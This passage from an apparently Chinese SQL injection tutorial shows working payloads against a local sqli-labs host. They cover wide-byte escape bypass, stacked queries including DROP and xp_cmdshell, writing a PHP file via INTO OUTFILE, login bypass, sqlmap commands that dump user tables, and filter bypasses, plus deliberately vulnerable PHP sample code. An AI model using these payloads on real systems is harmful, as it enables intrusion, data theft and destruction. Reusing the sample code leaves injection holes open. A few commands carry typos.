<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">' union select 1,2,3 from(select NAME_CONST(version(),1),NAME_CONST(version(),1))x--+</span></span><br></pre></td></tr></table></div></figure>
<h3 id="6-宽字节注入" >
<a href="#6-宽字节注入" class="heading-link"><i class="fas fa-link"></i></a><a href="#6-宽字节注入" class="headerlink" title="6 宽字节注入"></a>6 宽字节注入</h3>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">mysql在使用GBK编码的时候,会认为两个字节为一个汉字,例如<span class="operator">%</span>aa<span class="operator">%</span><span class="number">5</span>c就是一个汉字(前一个ascii码大于<span class="number">128</span>才能到汉字的范围)。我们在过滤’的时候,往往利用的思路是将‘转换为\’(转换的函数或者思路会在每一关遇到的时候介绍)。</span><br><span class="line">因此我们在此想办法将‘前面添加的\除掉,一般有两种思路:</span><br><span class="line"><span class="number">1</span>、<span class="operator">%</span>df吃掉\具体的原因是urlencode(‘\)<span class="operator">=</span><span class="operator">%</span><span class="number">5</span>c<span class="operator">%</span><span class="number">27</span>,我们在<span class="operator">%</span><span class="number">5</span>c<span class="operator">%</span><span class="number">27</span>前面添加<span class="operator">%</span>df,形成<span class="operator">%</span>df<span class="operator">%</span><span class="number">5</span>c<span class="operator">%</span><span class="number">27</span>,而上面提到的mysql在GBK编码方式的时候会将两个字节当做一个汉字,此时<span class="operator">%</span>df<span class="operator">%</span><span class="number">5</span>c就是一个汉字,<span class="operator">%</span><span class="number">27</span>则作为一个单独的符号在外面,同时也就达到了我们的目的。</span><br><span class="line"><span class="number">2</span>、将\’中的\过滤掉,例如可以构造<span class="operator">%</span><span class="operator">*</span><span class="operator">*</span><span class="operator">%</span><span class="number">5</span>c<span class="operator">%</span><span class="number">5</span>c<span class="operator">%</span><span class="number">27</span>的情况,后面的<span class="operator">%</span><span class="number">5</span>c会被前面的<span class="operator">%</span><span class="number">5</span>c给注释掉。这也是bypass的一种方法。</span><br></pre></td></tr></table></div></figure>
<p><img src="../../../picture/image-20210908111222895.png" alt="image-20210908111222895"></p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">此处过滤使用函数addslashes()</span><br><span class="line">addslashes()函数返回在预定义字符之前添加反斜杠的字符串。</span><br><span class="line">预定义字符是:</span><br><span class="line">单引号(<span class="string">')</span></span><br><span class="line"><span class="string">双引号(")</span></span><br><span class="line"><span class="string">反斜杠(\)</span></span><br><span class="line"><span class="string">提示:该函数可用于为存储在数据库中的字符串以及数据库查询语句准备字符串。Addslashes()函数和我们在32关实现的功能基本一致的,所以我们依旧可以利用%df进行绕</span></span><br><span class="line"><span class="string">过。</span></span><br><span class="line"><span class="string">Notice:使用addslashes(),我们需要将mysql_query设置为binary的方式,才能防御此漏洞。Mysql_query(“SET character_set_connection=gbk,character_set_result=gbk,character_set_client=binary”,$conn);</span></span><br></pre></td></tr></table></div></figure>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># sqlmap跑法</span><br><span class="line">sqlmap <span class="operator">-</span>u "http://192.168.18.12/sqlilab/Less-32/?id=1" <span class="comment">--batch --risk=3 --level=3 --random-agent - -dbs -v 3 --tamper unmagicquotes</span></span><br></pre></td></tr></table></div></figure>
<h3 id="7-堆叠注入" >
<a href="#7-堆叠注入" class="heading-link"><i class="fas fa-link"></i></a><a href="#7-堆叠注入" class="headerlink" title="7 堆叠注入"></a>7 堆叠注入</h3>
<p>适用(前提是所用数据库 API 允许一次执行多条语句):MySQL、SQLServer、PostgreSQL</p>
<p>不适用:Oracle</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span> 原理</span><br><span class="line">在<span class="keyword">SQL</span>中,分号(;)是用来表示一条<span class="keyword">sql</span>语句的结束。试想一下我们在;结束一个<span class="keyword">sql</span>语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而unioninjection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于<span class="keyword">union</span>或者unionall执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。</span><br><span class="line"><span class="keyword">Select</span> <span class="operator">*</span> <span class="keyword">from</span> products <span class="keyword">where</span> productid<span class="operator">=</span><span class="number">1</span>;<span class="keyword">DELETE</span> <span class="keyword">FROM</span> products</span><br><span class="line"></span><br><span class="line"><span class="number">2</span> 堆叠注入的局限性</span><br><span class="line">堆叠注入的局限性在于并不是每一个环境下都可以执行,可能受到API或者数据库引擎不支持的限制,当然了权限不足也可以解释为什么攻击者无法修改数据或者调用一些程序。</span><br></pre></td></tr></table></div></figure>
<p>mysql</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"># 新建一个表</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">where</span> id<span class="operator">=</span><span class="number">1</span>;<span class="keyword">create</span> <span class="keyword">table</span> test <span class="keyword">like</span> users;</span><br><span class="line"><span class="keyword">show</span> tabkes;</span><br><span class="line"># 删除上面新建的test表</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">where</span> id<span class="operator">=</span><span class="number">1</span>;<span class="keyword">drop</span> <span class="keyword">table</span> test;</span><br><span class="line"># 查询数据</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">where</span> id<span class="operator">=</span><span class="number">1</span>;<span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>;</span><br><span class="line"># 加载文件</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">where</span> id<span class="operator">=</span><span class="number">1</span>;<span class="keyword">select</span> load_file(<span 
class="string">'c:/tmpupbbn.php'</span>);</span><br><span class="line"># 修改数据</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">where</span> id<span class="operator">=</span><span class="number">1</span>;<span class="keyword">insert</span> <span class="keyword">into</span> users(id,username,password) <span class="keyword">values</span>(<span class="string">'100'</span>,<span class="string">'new'</span>,<span class="string">'new'</span>);</span><br></pre></td></tr></table></div></figure>
<p>sqlserver</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"># 增加数据表</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> test;<span class="keyword">create</span> <span class="keyword">table</span> sc3(ss <span class="type">CHAR</span>(<span class="number">8</span>));</span><br><span class="line"># 删除数据表</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> test;<span class="keyword">drop</span> <span class="keyword">table</span> sc3;</span><br><span class="line"># 查询数据</span><br><span class="line"><span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>;<span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> test;</span><br><span class="line"># 修改数据</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> test;update test <span class="keyword">set</span> name<span class="operator">=</span><span class="string">'test'</span> <span class="keyword">where</span> id<span class="operator">=</span><span class="number">3</span>;</span><br><span class="line"># 存储过程的执行</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> test <span class="keyword">where</span> id<span class="operator">=</span><span class="number">1</span>;<span class="keyword">exec</span> 
master..xp_cmdshell <span class="string">'ipconfig'</span></span><br></pre></td></tr></table></div></figure>
<p>PostgreSQL</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"># 增加数据表</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> user_test;<span class="keyword">create</span> <span class="keyword">table</span> user_data(id <span class="type">DATE</span>);</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> user_data;</span><br><span class="line"># 删除新建的user_data表</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> user_test;<span class="keyword">delete</span> <span class="keyword">from</span> user_data;</span><br><span class="line"># 查询数据</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> user_test;<span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>;</span><br><span class="line"># 修改数据</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> user_test;update user_test <span class="keyword">set</span> name<span class="operator">=</span><span class="string">'modify'</span> <span class="keyword">where</span> name<span class="operator">=</span><span class="string">'张三'</span>;</span><br></pre></td></tr></table></div></figure>
<h3 id="8-创建-上传文件" >
<a href="#8-创建-上传文件" class="heading-link"><i class="fas fa-link"></i></a><a href="#8-创建-上传文件" class="headerlink" title="8 创建/上传文件"></a>8 创建/上传文件</h3>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># 创建文件内容为 <span class="operator"><</span>?phpphpinfo();?<span class="operator">></span> <span class="number">16</span>进制</span><br><span class="line">?sort<span class="operator">=</span><span class="number">1</span><span class="string">'into outfile "c:\\wamp\\www\\sqllib\\test.php"lines terminated by 0x3c3f70687020706870696e666f28293b3f3e2020--+</span></span><br></pre></td></tr></table></div></figure>
<h3 id="9-搜索型注入" >
<a href="#9-搜索型注入" class="heading-link"><i class="fas fa-link"></i></a><a href="#9-搜索型注入" class="headerlink" title="9 搜索型注入"></a>9 搜索型注入</h3>
<p><strong>原理</strong>:</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$sql</span>=<span class="string">"select * from user where password like '%<span class="subst">$pwd</span>%' order by password"</span>;</span><br></pre></td></tr></table></div></figure>
<p>这句SQL语句根据用户输入的pwd在user表中查找相应的password,正常用户当然会输入例如admin、ckse等内容。但是如果有人输入这样的内容呢?</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">'and 1=1 and '</span>%<span class="string">'='</span></span><br></pre></td></tr></table></div></figure>
<p>这样的话这句SQL语句就变成了这样:</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from user where password like '%fendo'and 1=1 and '%'='%' order by password</span><br></pre></td></tr></table></div></figure>
<p><strong>搜索型注入判断</strong></p>
<p>1 搜索 keywords',如果出错,则有90%的可能性存在漏洞;</p>
<p>2 搜索 keywords%,如果同样出错,则有95%的可能性存在漏洞;</p>
<p>3 搜索 keywords%' and 1=1 and '%'='(这个语句的作用相当于普通SQL注入中的 and 1=1),观察返回结果</p>
<p>4 搜索 keywords%' and 1=2 and '%'='(这个语句的作用相当于普通SQL注入中的 and 1=2),观察返回结果</p>
<p>5 根据两次返回结果的差异判断是否存在搜索型注入</p>
<p>下面这几种语句都可以:</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">'and 1=1 and '</span>%<span class="string">'='</span></span><br><span class="line"></span><br><span class="line">%<span class="string">' and 1=1--'</span></span><br><span class="line"></span><br><span class="line">%<span class="string">' and 1=1 and '</span>%<span class="string">'='</span></span><br></pre></td></tr></table></div></figure>
<p><strong>实战</strong></p>
<p>1)get型注入</p>
<p>测试源码:</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?</span></span><br><span class="line"> <span class="variable">$pwd</span>=<span class="variable">$_GET</span>[<span class="string">'pwd'</span>];</span><br><span class="line"> <span class="variable">$conn</span>=mysql_connect(<span class="string">"127.0.0.1"</span>,<span class="string">"root"</span>,<span class="string">"123"</span>);<span class="comment">//连接mysql数据库</span></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$conn</span>){</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"连接数据库成功!"</span>; </span><br><span class="line"> }<span class="comment">//判断连接是否成功</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<br>"</span>;</span><br><span class="line"> mysql_select_db(<span class="string">'fendo'</span>,<span class="variable">$conn</span>);<span class="comment">//选择连接请求为conn的数据库(fendo)</span></span><br><span class="line"> <span class="variable">$sql</span>=<span class="string">"select * from user where password like '%<span class="subst">$pwd</span>%' order by password"</span>; <span class="comment">//字符型搜索语句</span></span><br><span 
class="line"> <span class="variable">$result</span>=mysql_query(<span class="variable">$sql</span>);</span><br><span class="line"> <span class="keyword">while</span>(<span class="variable">$row</span> = mysql_fetch_array(<span class="variable">$result</span>)){ </span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"用户ID:"</span>.<span class="variable">$row</span>[<span class="string">'id'</span>].<span class="string">"<br >"</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"用户名:"</span>.<span class="variable">$row</span>[<span class="string">'username'</span>].<span class="string">"<br >"</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"用户密码:"</span>.<span class="variable">$row</span>[<span class="string">'password'</span>].<span class="string">"<br >"</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"用户邮箱:"</span>.<span class="variable">$row</span>[<span class="string">'email'</span>].<span class="string">"<br >"</span>;</span><br><span class="line"> }</span><br><span class="line"> mysql_close(<span class="variable">$conn</span>); <span class="comment">//关闭数据库连接</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<hr>"</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"你当前执行的sql语句为:"</span>.<span class="string">"<br >"</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="variable">$sql</span>;</span><br><span class="line"> <span class="meta">?></span></span><br></pre></td></tr></table></div></figure>
<p>1、判断字段数</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%<span class="string">' union select 1,2,3,4,...... and '</span>%<span class="string">'='</span></span><br></pre></td></tr></table></div></figure>
<p>还有一种方法<br>语句:</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%<span class="string">' and exists (select id from user where LENGTH(username)<6 and id=1) and '</span>%<span class="string">'='</span></span><br></pre></td></tr></table></div></figure>
<p>逐次更换数字6,直到不再报错为止。如下,当它小于6时结果正确,说明字段数为5。</p>
<p>2、判断表名</p>
<p>语句:</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%<span class="string">'and(select count(*)from admin)>0 and '</span>%<span class="string">'='</span></span><br></pre></td></tr></table></div></figure>
<p>逐次更换表名admin,直到不再报错为止;不报错即说明该表存在。</p>
<p>3、猜解密码</p>
<p>2)post型注入</p>
<p>测试源码:</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?</span> </span><br><span class="line"></span><br><span class="line"><span 
class="comment">//--------------------------post处理--------------------------------// </span></span><br><span class="line"></span><br><span class="line"><span class="variable">$name</span>=addslashes(<span class="variable">$_POST</span>[<span class="string">'n'</span>]); </span><br><span class="line"></span><br><span class="line"><span class="variable">$pass</span>=addslashes(<span class="variable">$_POST</span>[<span class="string">'p'</span>]); </span><br><span class="line"></span><br><span class="line"><span class="variable">$conn</span> = mysql_connect(<span class="string">'127.0.0.1'</span>,<span class="string">'root'</span>,<span class="string">'123'</span>); </span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$conn</span>){ </span><br><span class="line"></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"mysql连接成功"</span>; </span><br><span class="line"></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<hr>"</span>; </span><br><span class="line"></span><br><span class="line">} </span><br><span class="line"></span><br><span class="line">mysql_select_db(<span class="string">'fendo'</span>,<span class="variable">$conn</span>); </span><br><span class="line"></span><br><span class="line"><span class="variable">$sql</span>=<span class="string">"select * from user where username='<span class="subst">$name</span>' and password='<span class="subst">$pass</span>'"</span>; </span><br><span class="line"></span><br><span class="line"><span class="variable">$result</span>=mysql_query(<span class="variable">$sql</span>); </span><br><span class="line"></span><br><span class="line">mysql_close(<span class="variable">$conn</span>); </span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span>(<span class="variable">$row</span> = mysql_fetch_array(<span class="variable">$result</span>)){ </span><br><span 
class="line"></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"用户ID:"</span>.<span class="variable">$row</span>[<span class="string">'id'</span>].<span class="string">"<br >"</span>; </span><br><span class="line"></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"用户名:"</span>.<span class="variable">$row</span>[<span class="string">'username'</span>].<span class="string">"<br >"</span>; </span><br><span class="line"></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"用户密码:"</span>.<span class="variable">$row</span>[<span class="string">'password'</span>].<span class="string">"<br >"</span>; </span><br><span class="line"></span><br><span class="line">} </span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">"当前执行的sql语句:"</span>.<span class="variable">$sql</span>; </span><br><span class="line"></span><br><span class="line"><span class="meta">?></span> </span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"><form action=<span class="string">""</span> method=<span class="string">"POST"</span>> </span><br><span class="line"></span><br><span class="line">账号:<input name=<span class="string">"n"</span> type=<span class="string">"text"</span> /><br><br> </span><br><span class="line"></span><br><span class="line">密码:<input name=<span class="string">"p"</span> type=<span class="string">"text"</span> /><br><br> </span><br><span class="line"></span><br><span class="line"><input name=<span class="string">""</span> type=<span class="string">"submit"</span> value=<span class="string">"提交"</span> /> </span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"></form> </span><br><span class="line"></span><br></pre></td></tr></table></div></figure>
<p>1、判断是否存在SQL注入</p>
<p>用PHP万能密码进行测试</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">' or 1=1# </span></span><br></pre></td></tr></table></div></figure>
<p>在用户名里输入万能密码,如果没有报错,就说明存在SQL注入。</p>
<p>2、猜字段数</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">' order by 4# </span></span><br></pre></td></tr></table></div></figure>
<p>逐次更改数字去猜,直到不报错为止。</p>
<p>3、猜表名</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">'or 1=1 union select 1,2,3,4 # </span></span><br></pre></td></tr></table></div></figure>
<p>逐次累加数字,直到不报错为止。</p>
<p>4.猜内容</p>
<p>将1,2,3替换为你想要获取的内容</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">'or 1=1 union select username,password,3,4 from user# </span></span><br></pre></td></tr></table></div></figure>
<h3 id="10-insert-update型注入点" >
<a href="#10-insert-update型注入点" class="heading-link"><i class="fas fa-link"></i></a><a href="#10-insert-update型注入点" class="headerlink" title="10 insert/update型注入点"></a>10 insert/update型注入点</h3>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"># 布尔注入</span><br><span class="line"><span class="keyword">Parameter</span>: sex (POST)</span><br><span class="line"> Type: <span class="type">boolean</span><span class="operator">-</span>based blind</span><br><span class="line"> Title: MySQL RLIKE <span class="type">boolean</span><span class="operator">-</span>based blind <span class="operator">-</span> <span class="keyword">WHERE</span>, <span class="keyword">HAVING</span>, <span class="keyword">ORDER</span> <span class="keyword">BY</span> <span class="keyword">or</span> <span class="keyword">GROUP</span> <span class="keyword">BY</span> clause</span><br><span class="line"> Payload: sex<span class="operator">=</span>a<span class="string">' RLIKE (SELECT (CASE WHEN (5274=5274) THEN 0x61 ELSE 0x28 END))-- sQlU&phonenum=a&add=a&email=a&submit=submit</span></span><br><span class="line"><span class="string"> Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))</span></span><br><span class="line"><span class="string"> </span></span><br><span class="line"><span class="string"># 报错注入</span></span><br><span class="line"><span class="string"> Type: error-based</span></span><br><span class="line"><span class="string"> Title: MySQL >= 5.1 AND error-based - WHERE, 
HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</span></span><br><span class="line"><span class="string"> Payload: sex=a'</span> <span class="keyword">AND</span> EXTRACTVALUE(<span class="number">3124</span>,CONCAT(<span class="number">0x5c</span>,<span class="number">0x716b767a71</span>,(<span class="keyword">SELECT</span> (ELT(<span class="number">3124</span><span class="operator">=</span><span class="number">3124</span>,<span class="number">1</span>))),<span class="number">0x7162626a71</span>))<span class="comment">-- bRMD&phonenum=a&add=a&email=a&submit=submit</span></span><br><span class="line"> Vector: <span class="keyword">AND</span> EXTRACTVALUE([RANDNUM],CONCAT(<span class="string">'\'</span>,<span class="string">'[DELIMITER_START]'</span>,([QUERY]),<span class="string">'[DELIMITER_STOP]'</span>))</span><br><span class="line"> </span><br><span class="line"># 延时注入</span><br><span class="line"> Type: <span class="type">time</span><span class="operator">-</span>based blind</span><br><span class="line"> Title: MySQL <span class="operator">>=</span> <span class="number">5.0</span><span class="number">.12</span> RLIKE <span class="type">time</span><span class="operator">-</span>based blind (query SLEEP)</span><br><span class="line"> Payload: sex<span class="operator">=</span>a<span class="string">' RLIKE (SELECT 6187 FROM (SELECT(SLEEP(5)))jLem)-- yIsA&phonenum=a&add=a&email=a&submit=submit</span></span><br><span class="line"><span class="string"> Vector: RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</span></span><br><span class="line"><span class="string"></span></span><br></pre></td></tr></table></div></figure>
<h3 id="sqlmap用法" >
<a href="#sqlmap用法" class="heading-link"><i class="fas fa-link"></i></a><a href="#sqlmap用法" class="headerlink" title="*sqlmap用法"></a>*sqlmap用法</h3>
<p>获取数据库信息</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u "http://192.168.18.12/sqlilab/Less-9/?id=1" --batch --level=3 --risk=3 --dbs</span><br></pre></td></tr></table></div></figure>
<p>获取数据表信息</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u "http://192.168.18.12/sqlilab/Less-9/?id=1" --batch --level=3 --risk=3 -D security --tables</span><br></pre></td></tr></table></div></figure>
<p>获取列信息</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u "http://192.168.18.12/sqlilab/Less-9/?id=1" --batch --level=3 --risk=3 -D security -T em ails --columns</span><br></pre></td></tr></table></div></figure>
<p>读取数据</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u "http://192.168.18.12/sqlilab/Less-9/?id=1" --batch --level=3 --risk=3 -D security -T us ers --C id,username,password --dump</span><br></pre></td></tr></table></div></figure>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># http头注入</span><br><span class="line">sqlmap.py -u “url” --host * --thread=1 --batch -v 1 --delay=0.7 --dbms mysql --current-db --current-user --dbs</span><br></pre></td></tr></table></div></figure>
<h2 id="0x02-绕过及过滤闭合" >
<a href="#0x02-绕过及过滤闭合" class="heading-link"><i class="fas fa-link"></i></a><a href="#0x02-绕过及过滤闭合" class="headerlink" title="0x02 绕过及过滤闭合"></a>0x02 绕过及过滤闭合</h2>
<h3 id="1、绕过" >
<a href="#1、绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#1、绕过" class="headerlink" title="1、绕过"></a>1、绕过</h3>
<h4 id="1-注释符绕过" >
<a href="#1-注释符绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#1-注释符绕过" class="headerlink" title="1 注释符绕过"></a>1 注释符绕过</h4>
<p>常用注释符:</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">//,</span><br><span class="line">-- ,</span><br><span class="line">/**/,</span><br><span class="line">#,</span><br><span class="line">--+,</span><br><span class="line">-- -,</span><br><span class="line">;,%00,</span><br><span class="line">--aUNION /**/ Select /**/user,pwd,from userU/**/ NION /**/ SE/**/ LECT /**/user,pwd from user</span><br></pre></td></tr></table></div></figure>
<p>绕过注释符号(#,–)过滤:</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">id<span class="operator">=</span><span class="number">1</span><span class="string">'union select 1,2,3||'</span><span class="number">1</span></span><br><span class="line"></span><br><span class="line">最后的<span class="keyword">or</span> <span class="string">'1闭合查询语句的最后的单引号,或者:</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">id=1'</span><span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="string">'3</span></span><br></pre></td></tr></table></div></figure>
<h4 id="2-or-and-绕过" >
